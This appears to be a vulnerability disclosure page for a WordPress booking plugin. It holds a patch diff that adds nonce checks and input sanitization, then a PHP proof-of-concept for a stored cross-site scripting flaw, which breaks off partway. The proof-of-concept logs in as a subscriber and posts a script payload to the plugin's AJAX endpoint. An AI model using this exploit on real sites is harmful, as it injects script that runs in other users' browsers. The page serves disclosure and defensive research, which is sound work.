                         'start_time' => $breakstart_time,
                         'end_time' => $breakend_time,
@@ -1023,16 +1026,15 @@
                     update_post_meta($post_id, 'saab_breaktimeslots', $sanitized_breaktimeslots);
                 }

-                if (isset($_POST['generatetimeslot'])) {
-                    $generatetimeslots = $_POST['generatetimeslot'];
-                    // Sanitize and save the values
+                $generatetimeslots = ( isset( $_POST['generatetimeslot'] ) && is_array( $_POST['generatetimeslot'] ) )
+                    ? map_deep( wp_unslash( $_POST['generatetimeslot'] ), 'sanitize_text_field' )
+                    : array();
+                if ( ! empty( $generatetimeslots ) ) {
                     $sanitized_generatetimeslots = array();
-                    foreach ($generatetimeslots as $generatetimeslot) {
-                        $generatestart_time = $generatetimeslot['start_time'];
-                        $generateend_time = $generatetimeslot['end_time'];
+                    foreach ( $generatetimeslots as $generatetimeslot ) {
                         $sanitized_generatetimeslots[] = array(
-                        'start_time' => $generatestart_time,
-                        'end_time' => $generateend_time,
+                            'start_time' => isset( $generatetimeslot['start_time'] ) ? $generatetimeslot['start_time'] : '',
+                            'end_time' => isset( $generatetimeslot['end_time'] ) ? $generatetimeslot['end_time'] : '',
                         );
                     }
                     update_post_meta($post_id, 'saab_generatetimeslot', $sanitized_generatetimeslots);
@@ -1050,44 +1052,46 @@
                 }

             //Enable Recurring Events
-            if (isset($_POST['enable_recurring_apt']) && filter_var($_POST['enable_recurring_apt'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_recurring_apt'] ) && filter_var( wp_unslash( $_POST['enable_recurring_apt'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_recurring_apt', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_recurring_apt');
             }
-            if (isset($_POST['enable_advance_setting']) && filter_var($_POST['enable_advance_setting'], FILTER_VALIDATE_BOOLEAN)) {
+            if ( isset( $_POST['enable_advance_setting'] ) && filter_var( wp_unslash( $_POST['enable_advance_setting'] ), FILTER_VALIDATE_BOOLEAN ) ) {
                 update_post_meta($post_id, 'saab_enable_advance_setting', 1);
             } else {
                 delete_post_meta($post_id, 'saab_enable_advance_setting');
             }
-            if (isset($_POST['recurring_type'])) {
-                $recurring_type = sanitize_text_field($_POST['recurring_type']);
-                update_post_meta($post_id, 'saab_recurring_type', $recurring_type);
-            }
-            if (isset($_POST['recur_weekdays'])) {
-                $sanitized_recur_weekdays = array_map('sanitize_text_field', $_POST['recur_weekdays']);
-                update_post_meta($post_id, 'saab_recur_weekdays', $sanitized_recur_weekdays);
-            }
-            if (isset($_POST['advancedata'])) {
-                $advancedata = $_POST['advancedata'];
-                update_post_meta($post_id, 'saab_advancedata', $advancedata);
+            if ( isset( $_POST['recurring_type'] ) ) {
+                $recurring_type = sanitize_text_field( wp_unslash( $_POST['recurring_type'] ) );
+                update_post_meta( $post_id, 'saab_recurring_type', $recurring_type );
+            }
+            if ( isset( $_POST['recur_weekdays'] ) ) {
+                $sanitized_recur_weekdays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['recur_weekdays'] ) );
+                update_post_meta( $post_id, 'saab_recur_weekdays', $sanitized_recur_weekdays );
+            }
+            if ( isset( $_POST['advancedata'] ) ) {
+                $advancedata = is_array( $_POST['advancedata'] )
+                    ? map_deep( wp_unslash( $_POST['advancedata'] ), 'sanitize_text_field' )
+                    : sanitize_text_field( wp_unslash( $_POST['advancedata'] ) );
+                update_post_meta( $post_id, 'saab_advancedata', $advancedata );
             }else {
                 delete_post_meta($post_id, 'saab_advancedata');
             }
-            if (isset($_POST['holidays'])) {
-                $holidays = array_map('sanitize_text_field', $_POST['holidays']);
+            if ( isset( $_POST['holidays'] ) ) {
+                $holidays = array_map( 'sanitize_text_field', (array) wp_unslash( $_POST['holidays'] ) );
                 update_post_meta($post_id, 'saab_holiday_dates', $holidays);
             }
-            if (isset($_POST['end_repeats'])) {
-                $end_repeats = sanitize_text_field($_POST['end_repeats']);
+            if ( isset( $_POST['end_repeats'] ) ) {
+                $end_repeats = sanitize_text_field( wp_unslash( $_POST['end_repeats'] ) );
                 update_post_meta($post_id, 'saab_end_repeats', $end_repeats);
             }
-            if (isset($_POST['end_repeats_on'])) {
-                $end_repeats_on = sanitize_text_field($_POST['end_repeats_on']);
+            if ( isset( $_POST['end_repeats_on'] ) ) {
+                $end_repeats_on = sanitize_text_field( wp_unslash( $_POST['end_repeats_on'] ) );
                 update_post_meta($post_id, 'saab_end_repeats_on', $end_repeats_on);
             }
-            if (isset($_POST['end_repeats_after'])) {
-                $end_repeats_after = sanitize_text_field($_POST['end_repeats_after']);
+            if ( isset( $_POST['end_repeats_after'] ) ) {
+                $end_repeats_after = sanitize_text_field( wp_unslash( $_POST['end_repeats_after'] ) );
                 update_post_meta($post_id, 'saab_end_repeats_after', $end_repeats_after);
             }
          }
@@ -1110,41 +1114,41 @@
                 return;
             }

-            if (isset($_POST['notes'])) {
-                $notes = sanitize_textarea_field($_POST['notes']);
+            if ( isset( $_POST['notes'] ) ) {
+                $notes = sanitize_textarea_field( wp_unslash( $_POST['notes'] ) );
                 update_post_meta($post_id, 'saab_notes', $notes);
             }

-            if (isset($_POST['form_id'])) {
-                $form_id = sanitize_text_field($_POST['form_id']);
+            if ( isset( $_POST['form_id'] ) ) {
+                $form_id = sanitize_text_field( wp_unslash( $_POST['form_id'] ) );
             }

-            if (isset($_POST['no_of_bookings'])) {
-                $no_of_bookings = absint($_POST['no_of_bookings']);
+            if ( isset( $_POST['no_of_bookings'] ) ) {
+                $no_of_bookings = absint( wp_unslash( $_POST['no_of_bookings'] ) );
                 update_post_meta($post_id, 'saab_slotcapacity', $no_of_bookings);
             }

-            if (isset($_POST['booking_date'])) {
-                $booking_date = sanitize_text_field($_POST['booking_date']);
+            if ( isset( $_POST['booking_date'] ) ) {
+                $booking_date = sanitize_text_field( wp_unslash( $_POST['booking_date'] ) );
                 $currentMonth = gmdate('n',strtotime($booking_date));
                 $currentYear = gmdate('Y',strtotime($booking_date));
                 $currentday = gmdate('j', strtotime($booking_date));
                 $booking_date = 'saabid_'.$form_id.'_'.$currentMonth.'_'.$currentday.'_'.$currentYear;
                 update_post_meta($post_id, 'saab_booking_date', $booking_date);
             }
-            if (isset($_POST['start_time']) && isset($_POST['end_time'])) {
-                $start_time = trim(gmdate("h:i A", strtotime( sanitize_text_field($_POST['start_time']) )));
-                $end_time = trim(gmdate("h:i A", strtotime( sanitize_text_field($_POST['end_time']) )));
+            if ( isset( $_POST['start_time'] ) && isset( $_POST['end_time'] ) ) {
+                $start_time = trim( gmdate( 'h:i A', strtotime( sanitize_text_field( wp_unslash( $_POST['start_time'] ) ) ) ) );
+                $end_time  = trim( gmdate( 'h:i A', strtotime( sanitize_text_field( wp_unslash( $_POST['end_time'] ) ) ) ) );
                 $timeslot = $start_time.'-'.$end_time;
                 update_post_meta($post_id, 'saab_timeslot', $timeslot);
             }

-            if (isset($_POST['manual_notification']) &&  sanitize_text_field($_POST['manual_notification']  !== 'any')) {
-                $selected_action = isset($_POST['manual_notification']) ? sanitize_text_field($_POST['manual_notification']) : '';
-                $booking_status = isset($_POST['booking_status']) ? sanitize_text_field($_POST['booking_status']) : '';
-                // update_post_meta($post_id, 'saab_entry_status', $booking_status);
-                $bookingId = isset($_POST['post_id']) ? absint($_POST['post_id']) : '';
-                $status = isset($_POST['status']) ? sanitize_text_field($_POST['status']) : '';
+            if ( isset( $_POST['manual_notification'] ) && sanitize_text_field( wp_unslash( $_POST['manual_notification'] ) ) !== 'any' ) {
+                $selected_action  = isset( $_POST['manual_notification'] ) ? sanitize_text_field( wp_unslash( $_POST['manual_notification'] ) ) : '';
+                $booking_status  = isset( $_POST['booking_status'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_status'] ) ) : '';
+                // update_post_meta($post_id, 'saab_entry_status', $booking_status);
+                $bookingId       = isset( $_POST['post_id'] ) ? absint( wp_unslash( $_POST['post_id'] ) ) : 0;
+                $status          = isset( $_POST['status'] ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : '';
                 $formdata = get_post_meta($bookingId,'saab_submission_data',true);
                 $listform_label_val =$this->saab_admin_getkey_value_formshortcodes($post_id,$formdata);
                 $listform_label_val['Status'] = $booking_status;
@@ -1152,9 +1156,9 @@
                 $send_notification =$this->saab_admin_send_notification($selected_action,$form_id, $post_id, $listform_label_val);
                 update_post_meta($post_id, 'saab_manual_notification', $selected_action);

-            }else{
-                $booking_status = isset($_POST['booking_status']) ? sanitize_text_field($_POST['booking_status']) : '';
-                update_post_meta($post_id, 'saab_entry_status', $booking_status);
+            } else {
+                $booking_status = isset( $_POST['booking_status'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_status'] ) ) : '';
+                update_post_meta( $post_id, 'saab_entry_status', $booking_status );
                 $formdata = get_post_meta($post_id,'saab_submission_data',true);
                 $listform_label_val =$this->saab_admin_getkey_value_formshortcodes($post_id,$formdata);
                 $listform_label_val['Status'] = $booking_status;
@@ -1301,14 +1305,16 @@
                         $message = esc_html__('Email sent successfully','smart-appointment-booking');
                     } else {
                         $message = esc_html__('Failed to send email','smart-appointment-booking');
-                        error_log('Failed to send email');
+                        // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+                        error_log( 'Failed to send email' );
                     }
                 }

             }
-            if ($notificationFound === false) {
-                $message = esc_html__('Notification not found for the given status', 'smart-appointment-booking');
-                error_log('Notification not found for the given status');
+            if ( $notificationFound === false ) {
+                $message = esc_html__( 'Notification not found for the given status', 'smart-appointment-booking' );
+                // phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+                error_log( 'Notification not found for the given status' );
             }
             return $message;
         }
--- a/smart-appointment-booking/inc/class.saab.php
+++ b/smart-appointment-booking/inc/class.saab.php
@@ -52,10 +52,6 @@

 			global $wp_version;

-			# Set filter for plugin's languages directory
-			$SAAB_lang_dir = dirname( SAAB_PLUGIN_BASENAME ) . '/languages/';
-			$SAAB_lang_dir = apply_filters( 'SAAB_languages_directory', $SAAB_lang_dir );
-
 			# Traditional WordPress plugin locale filter.
 			$get_locale = get_locale();

@@ -73,10 +69,8 @@
 			if ( file_exists( $mofile_global ) ) {
 				# Look in global /wp-content/languages/plugin-name folder
 				load_textdomain( 'smart-appointment-booking', $mofile_global );
-			} else {
-				# Load the default language files
-				load_plugin_textdomain( 'smart-appointment-booking', false, $SAAB_lang_dir );
 			}
+			# When hosted on WordPress.org, translations are loaded automatically; no load_plugin_textdomain() needed.
         }
     }
 }
--- a/smart-appointment-booking/inc/front/class.saab.front.action.php
+++ b/smart-appointment-booking/inc/front/class.saab.front.action.php
@@ -109,16 +109,17 @@
 		function saab_summary() {
 			ob_start();
 			$user_id = get_current_user_id();
-			$post_ids = array();
+			$post_ids = array();
+			// phpcs:ignore WordPress.DB.SlowDBQuery.slow_db_query_meta_key, WordPress.DB.SlowDBQuery.slow_db_query_meta_value -- User's bookings filtered by user_mapped meta.
 			$args = array(
-				'post_type' => 'manage_entries',
-				'meta_key' => 'user_mapped',
-				'meta_value' => $user_id,
-				'fields' => 'ids',
+				'post_type'      => 'manage_entries',
+				'meta_key'       => 'user_mapped',
+				'meta_value'     => $user_id,
+				'fields'         => 'ids',
 				'posts_per_page' => 55,
 			);
-
-			$query = new WP_Query($args);
+
+			$query = new WP_Query( $args );

 			if ($query->have_posts()) {
 				while ($query->have_posts()) {
@@ -268,13 +269,15 @@
 			return $isbooking_open;
 		}

-		function saab_save_form_submission() {
-			// ini_set('display_startup_errors', 1);
-			// ini_set('display_errors', 1);
-			// error_reporting(-1);
-		//if( ! wp_verify_nonce( 'saab_front_nonce' ) ){} // ignoring nonce validation error in the front form
-		$form_id = ( isset( $_POST['fid'] ) ) ? $_POST['fid'] : '';
-		$form_data = ( isset( $_POST['form_data'] ) ) ? $_POST['form_data'] : '';
+		function saab_save_form_submission() {
+			$nonce_key = isset( $_POST['nonce'] ) ? 'nonce' : ( isset( $_POST['security'] ) ? 'security' : '' );
+			$nonce_val = ( $nonce_key && isset( $_POST[ $nonce_key ] ) ) ? sanitize_text_field( wp_unslash( $_POST[ $nonce_key ] ) ) : '';
+			if ( ! $nonce_val || ! wp_verify_nonce( $nonce_val, 'my_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			$form_id = isset( $_POST['fid'] ) ? absint( wp_unslash( $_POST['fid'] ) ) : 0;
+			$form_data = isset( $_POST['form_data'] ) && is_array( $_POST['form_data'] ) ? map_deep( wp_unslash( $_POST['form_data'] ), 'sanitize_text_field' ) : array();
 		// User
 		$is_user_logged_in = is_user_logged_in();
 		$userLoginRequired = get_post_meta($form_id, 'saab_userLoginRequired', true);
@@ -344,7 +347,11 @@

 								$usererror = true;
 								wp_send_json_error(array(
-									'message' => __('Error creating user '. $user_id->get_error_message(),'smart-appointment-booking'),
+									'message' => sprintf(
+										/* translators: %s: error message from user creation */
+										__( 'Error creating user %s', 'smart-appointment-booking' ),
+										$user_id->get_error_message()
+									),
 									'error' => $usererror,
 								));

@@ -585,14 +592,13 @@
 			// 	}
 			// }
 			if(empty($saab_amount)){
-				$error_message = "Amount configuration Error";
 				wp_delete_post($created_post_id, true);
 				wp_send_json_error(array(
-					'message' => __($error_message, 'smart-appointment-booking'),
+					'message' => __( 'Amount configuration Error', 'smart-appointment-booking' ),
 					'error' => true,
 				));
 			}
-			$stripetoken = ( isset( $_POST['token'] ) ) ? $_POST['token'] : '';
+			$stripetoken = isset( $_POST['token'] ) ? sanitize_text_field( wp_unslash( $_POST['token'] ) ) : '';
 			// Set your Stripe Publishable key
 			SabStripe::setApiKey($secretKey); // Replace with your Stripe API key

@@ -636,10 +642,13 @@
 				// $payment_response = ( is_array( $paymentIntent ) || is_object( $paymentIntent ) ) ?  print_r( $paymentIntent, true ) : $paymentIntent;

 			}catch ( Exception $e ) {
-				$error_message = $e->getMessage();
 				wp_delete_post($created_post_id, true);
 				wp_send_json_error(array(
-					'message' => __($error_message, 'smart-appointment-booking'),
+					'message' => sprintf(
+						/* translators: %s: payment exception error message */
+						__( 'Payment error: %s', 'smart-appointment-booking' ),
+						$e->getMessage()
+					),
 					'error' => true,
 				));
 			}
@@ -744,24 +753,24 @@
 		 */

 		function saab_booking_form_submission() {
-// 			ini_set('display_startup_errors', 1);
-// ini_set('display_errors', 1);
-// error_reporting(-1);
-            $error ='';
-           // if( ! wp_verify_nonce( 'saab_front_nonce' ) ){}
-			$booking_date = ( isset( $_POST['booking_date'] ) ) ? $_POST['booking_date'] : '';
-			$explode_booking_date = explode('_',$booking_date);
-			$form_id = $explode_booking_date[1];
-			$format_bookingdate = $explode_booking_date[4] . "-" . $explode_booking_date[2] . "-" . $explode_booking_date[3];
-			$converted_bookingdate = date('Y-m-d', strtotime($format_bookingdate));
-			$timeslot = ( isset( $_POST['timeslot'] ) ) ? $_POST['timeslot'] : '';
-			//total availableseats
-			$slotcapacity = ( isset( $_POST['slotcapacity'] ) ) ? $_POST['slotcapacity'] : '';
-			//quantity
-			$bookedseats = ( isset( $_POST['bookedseats'] ) )? $_POST['bookedseats'] : '' ;
-			$form_id = isset($_POST['fid']) ? absint($_POST['fid']) : 0;
-			$form_data = isset( $_POST['form_data'] ) ? $_POST['form_data']:'';
-			if (is_array($form_data)) {
+			$nonce_key = isset( $_POST['nonce'] ) ? 'nonce' : ( isset( $_POST['security'] ) ? 'security' : '' );
+			$nonce_val = ( $nonce_key && isset( $_POST[ $nonce_key ] ) ) ? sanitize_text_field( wp_unslash( $_POST[ $nonce_key ] ) ) : '';
+			if ( ! $nonce_val || ! wp_verify_nonce( $nonce_val, 'my_ajax_nonce' ) ) {
+				wp_send_json_error( array( 'message' => __( 'Security check failed.', 'smart-appointment-booking' ) ) );
+				wp_die();
+			}
+			$error = '';
+			$booking_date = isset( $_POST['booking_date'] ) ? sanitize_text_field( wp_unslash( $_POST['booking_date'] ) ) : '';
+			$explode_booking_date = explode( '_', $booking_date );
+			$form_id = isset( $explode_booking_date[1] ) ? absint( $explode_booking_date[1] ) : 0;
+			$format_bookingdate = ( isset( $explode_booking_date[4], $explode_booking_date[2], $explode_booking_date[3] ) ) ? $explode_booking_date[4] . '-' . $explode_booking_date[2] . '-' . $explode_booking_date[3] : '';
+			$converted_bookingdate = $format_bookingdate ? gmdate( 'Y-m-d', strtotime( $format_bookingdate ) ) : '';
+			$timeslot = isset( $_POST['timeslot'] ) ? sanitize_text_field( wp_unslash( $_POST['timeslot'] ) ) : '';
+			$slotcapacity = isset( $_POST['slotcapacity'] ) ? sanitize_text_field( wp_unslash( $_POST['slotcapacity'] ) ) : '';
+			$bookedseats = isset( $_POST['bookedseats'] ) ? sanitize_text_field( wp_unslash( $_POST['bookedseats'] ) ) : '';
+			$form_id = isset( $_POST['fid'] ) ? absint( wp_unslash( $_POST['fid'] ) ) : $form_id;
+			$form_data = isset( $_POST['form_data'] ) ? wp_unslash( $_POST['form_data'] ) : array(); // phpcs:ignore WordPress.Security.ValidatedSanitizedInput.InputNotSanitized -- sanitized in loop below
+			if ( is_array( $form_data ) ) {
 				foreach ($form_data as $field_name => $field_value) {
 					// Check if the field value is an array (e.g., for checkboxes or multi-select)
 					if (is_array($field_value)) {
@@ -988,13 +997,13 @@
 			wp_die();
 		}
 		function saab_add_event_to_calender(){
-
+			// OAuth callback from Google; code/state are from redirect, not form POST. Nonce not applicable.
+			// phpcs:disable WordPress.Security.NonceVerification.Recommended
 			ob_start();

-			if(isset($_GET['code'])){
-
-				require_once SAAB_DIR . '/inc/lib/google-library/vendor/autoload.php';
-				$stateParameter = ( isset( $_GET['state'] ) ) ? $_GET['state'] : '';
+			if ( isset( $_GET['code'] ) ) {
+				require_once SAAB_DIR . '/inc/lib/google-library/vendor/autoload.php';
+				$stateParameter = isset( $_GET['state'] ) ? sanitize_text_field( wp_unslash( $_GET['state'] ) ) : '';
 				$mystate = explode('T', $stateParameter);
 				$form_id = $mystate[0];
 				$post_id = $mystate[1];
@@ -1039,9 +1048,9 @@

 				$client_new->setAccessType('offline');

-				if (isset($_GET['code'])) {
-
-					$token = $client_new->fetchAccessTokenWithAuthCode($_GET['code']);
+				if ( isset( $_GET['code'] ) ) {
+					$auth_code = sanitize_text_field( wp_unslash( $_GET['code'] ) );
+					$token = $client_new->fetchAccessTokenWithAuthCode( $auth_code );
 					$client_new->setAccessToken($token);
 					$service = new Google_Service_Calendar($client_new);

@@ -1103,6 +1112,7 @@
 					}
 				}
 			}
+			// phpcs:enable WordPress.Security.NonceVerification.Recommended
 			return ob_get_clean();
 		}
 		/**
@@ -1116,23 +1126,26 @@
 		 * @return string             A message indicating the result of the email sending process.
 		 */
 		function saab_send_notification($status, $form_id, $post_id, $form_data) {
-			// Sanitize the status value from $_POST, if applicable
-			$status = (isset($_POST['status']) && !empty($_POST['status'])) ? sanitize_text_field($_POST['status']) : $status;
-
-			// Log status to ensure it's being received correctly
-			if (defined('WP_DEBUG') && WP_DEBUG) {
-				error_log('Status received: ' . $status);
+			// Status may be overridden from POST; nonce verified in calling AJAX handler.
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$status = ( isset( $_POST['status'] ) && ! empty( $_POST['status'] ) ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : $status;
+
+			// Log status to ensure it's being received correctly.
+			if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+				// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+				error_log( 'Status received: ' . $status );
 			}
-
+
 			$message = '';
 			$notificationFound = false;
-
+
 			// Get notification data
-			$get_notification_array = get_post_meta($form_id, 'saab_notification_data', true);
-
-			// Log the retrieved notification data for debugging
-			if (defined('WP_DEBUG') && WP_DEBUG) {
-				error_log('Notification array: ' . print_r($get_notification_array, true));
+			$get_notification_array = get_post_meta( $form_id, 'saab_notification_data', true );
+
+			// Log the retrieved notification data for debugging.
+			if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+				// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+				error_log( 'Notification array: ' . print_r( $get_notification_array, true ) );
 			}

 			// Check if the notification data exists and is an array
@@ -1142,9 +1155,10 @@
 					if ($notification['state'] === 'enabled' && $notification['type'] === $status) {
 						$notificationFound = true; // Mark notification as found

-						// Log notification for debugging
-						if (defined('WP_DEBUG') && WP_DEBUG) {
-							error_log('Notification found: ' . print_r($notification, true));
+						// Log notification for debugging.
+						if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+							// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log, WordPress.PHP.DevelopmentFunctions.error_log_print_r
+							error_log( 'Notification found: ' . print_r( $notification, true ) );
 						}

 						$check_to = $notification['to'];
@@ -1166,11 +1180,12 @@
 						$cc = $this->saab_check_shortcode_exist($check_cc, $form_id, $form_data, $shortcodesArray);
 						$check_body = $this->saab_check_shortcodes_exist_in_editor($check_body, $form_id, $form_data, $shortcodesArray);

-						// Log email details for debugging
-						if (defined('WP_DEBUG') && WP_DEBUG) {
-							error_log('Email details: to: ' . $to . ', from: ' . $from . ', subject: ' . $subject . ', body: ' . $check_body);
+						// Log email details for debugging.
+						if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+							// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+							error_log( 'Email details: to: ' . $to . ', from: ' . $from . ', subject: ' . $subject . ', body: ' . $check_body );
 						}
-
+
 						// Set email headers
 						$headers = array(
 							'From: ' . sanitize_email($from),
@@ -1192,27 +1207,34 @@
 						if ($result) {
 							$message = esc_html__('Email sent successfully', 'smart-appointment-booking');
 						} else {
-							$message = esc_html__('Failed to send email', 'smart-appointment-booking');
-							if (defined('WP_DEBUG') && WP_DEBUG) {
-								error_log('Failed to send email to: ' . $to); // Debug logging
+							$message = esc_html__( 'Failed to send email', 'smart-appointment-booking' );
+							if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+								// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+								error_log( 'Failed to send email to: ' . $to );
 							}
 						}
 					}
 				}
 			} else {
-				// Log an error if no notification data was found for the form
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('No notification data found for form ID: ' . $form_id);
+				// Log an error if no notification data was found for the form.
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'No notification data found for form ID: ' . $form_id );
 				}
 			}
-
-			// If no notification was found, log an error
-			if ($notificationFound === false) {
-				$message = __('Notification not found for the given status: ' . $status, 'smart-appointment-booking');
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('Notification not found for the given status: ' . $status); // Debug logging
+
+			// If no notification was found, log an error.
+			if ( $notificationFound === false ) {
+				$message = sprintf(
+					/* translators: %s: notification status (e.g. booked, approved, cancelled) */
+					__( 'Notification not found for the given status: %s', 'smart-appointment-booking' ),
+					$status
+				);
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'Notification not found for the given status: ' . $status );
 				}
-				wp_send_json_error(array('message' => $message));
+				wp_send_json_error( array( 'message' => $message ) );
 				wp_die();
 			}

@@ -1224,8 +1246,9 @@


 		function saab_send_post_update_notification($status, $form_id, $post_id, $form_data) {
-			// Sanitize status and other input data
-			$status = (isset($_POST['status']) && !empty($_POST['status'])) ? sanitize_text_field($_POST['status']) : sanitize_text_field($status);
+			// Status may be overridden from POST; nonce verified in calling AJAX handler.
+			// phpcs:ignore WordPress.Security.NonceVerification.Missing
+			$status = ( isset( $_POST['status'] ) && ! empty( $_POST['status'] ) ) ? sanitize_text_field( wp_unslash( $_POST['status'] ) ) : sanitize_text_field( $status );
 			$message = '';

 			// Get notification data from post meta
@@ -1283,9 +1306,20 @@
 							$message = __('Email sent successfully', 'smart-appointment-booking');
 						} else {
 							// Log details if email sending fails
-							$message = __('Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . json_encode($headers), 'smart-appointment-booking');
-							if (defined('WP_DEBUG') && WP_DEBUG) {
-								error_log('Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . json_encode($headers));
+							$message = sprintf(
+								/* translators: 1: to address, 2: from address, 3: Bcc, 4: Cc, 5: subject, 6: body, 7: headers */
+								__( 'Failed to send email. Details: to-%1$s, from-%2$s, Bcc-%3$s, Cc-%4$s, subject-%5$s, body-%6$s, headers-%7$s', 'smart-appointment-booking' ),
+								$to,
+								$from,
+								$bcc,
+								$cc,
+								$subject,
+								$check_body,
+								wp_json_encode( $headers )
+							);
+							if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+								// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+								error_log( 'Failed to send email. Details: to-' . $to . ', from-' . $from . ', Bcc-' . $bcc . ', Cc-' . $cc . ', subject-' . $subject . ', body-' . $check_body . ', headers-' . wp_json_encode( $headers ) );
 							}
 						}
 					}
@@ -1293,16 +1327,21 @@
 			}

 			// Handle case where no matching notification is found
-			if ($notificationFound === false) {
-				$message = __('Notification not found for the given status: ' . $status, 'smart-appointment-booking');
-				if (defined('WP_DEBUG') && WP_DEBUG) {
-					error_log('Notification not found for the given status: ' . $status);
+			if ( $notificationFound === false ) {
+				$message = sprintf(
+					/* translators: %s: notification status (e.g. booked, approved, cancelled) */
+					__( 'Notification not found for the given status: %s', 'smart-appointment-booking' ),
+					$status
+				);
+				if ( defined( 'WP_DEBUG' ) && WP_DEBUG ) {
+					// phpcs:ignore WordPress.PHP.DevelopmentFunctions.error_log_error_log
+					error_log( 'Notification not found for the given status: ' . $status );
 				}
 			}
-
+
 			return $message;
 		}
-
+
 		/**
 		 * Process the given field value containing shortcodes and replace them with actual values.
 		 *
@@ -2112,8 +2151,8 @@
 							<?php
 							$timezone = get_post_meta($post_id,'saab_timezone',true);
 							$error = false;
-							$TodaysDate = date('F d, Y');
-							$todaysDate = date('Y-m-d');
+							$TodaysDate = gmdate( 'F d, Y' );
+							$todaysDate = gmdate( 'Y-m-d' );
 							echo "<h3 id='head_avail_time'><span class='gfb-timezone'>Timezone: " . esc_attr($timezone) .

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-0742 - Smart Appointment & Booking <= 1.0.7 - Authenticated (Subscriber+) Stored Cross-Site Scripting via saab_save_form_data AJAX Action

<?php
/**
 * Proof of Concept for CVE-2026-0742
 * Requires valid WordPress subscriber credentials
 * Targets the saab_save_form_data AJAX endpoint
 */

$target_url = 'https://vulnerable-site.com';
$username = 'subscriber_user';
$password = 'subscriber_pass';
$entry_id = '123'; // Target form entry ID

// Initialize cURL session for WordPress login
$ch = curl_init();

// Step 1: Get login page to retrieve nonce
curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_COOKIEJAR, 'cookies.txt');
$login_page = curl_exec($ch);

// Step 2: Extract login nonce (WordPress 5.0+)
preg_match('/name="log"[^>]*>/', $login_page, $matches);

// Step 3: Submit login credentials
$post_fields = [
    'log' => $username,
    'pwd' => $password,
    'wp-submit' => 'Log In',
    'redirect_to' => $target_url . '/wp-admin/',
    'testcookie' => '1'
];

curl_setopt($ch, CURLOPT_URL, $target_url . '/wp-login.php');
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($post_fields));
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
$login_response = curl_exec($ch);

// Step 4: Verify login success by checking for admin bar
if (strpos($login_response, 'wp-admin-bar') === false) {
    die('Login failed. Check credentials.');
}

// Step 5: Exploit the vulnerable AJAX endpoint
$ajax_url = $target_url . '/wp-admin/admin-ajax.php';
$payload = '<script>alert("XSS via CVE-2026-0742");</script>';

$exploit_data = [
    'action' => 'saab_save_form_data',
    'entry_id' => $entry_id,
    'updated_data[field_name]' => $payload // Replace field_name with actual form field
];

curl_setopt($ch, CURLOPT_URL, $ajax_url);
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($exploit_data));
curl_setopt($ch, CURLOPT_POST, 1);
$ajax_response = curl_exec($ch);

// Step 6: Check for successful injection
if (strpos($ajax_response, 'success') !== false) {
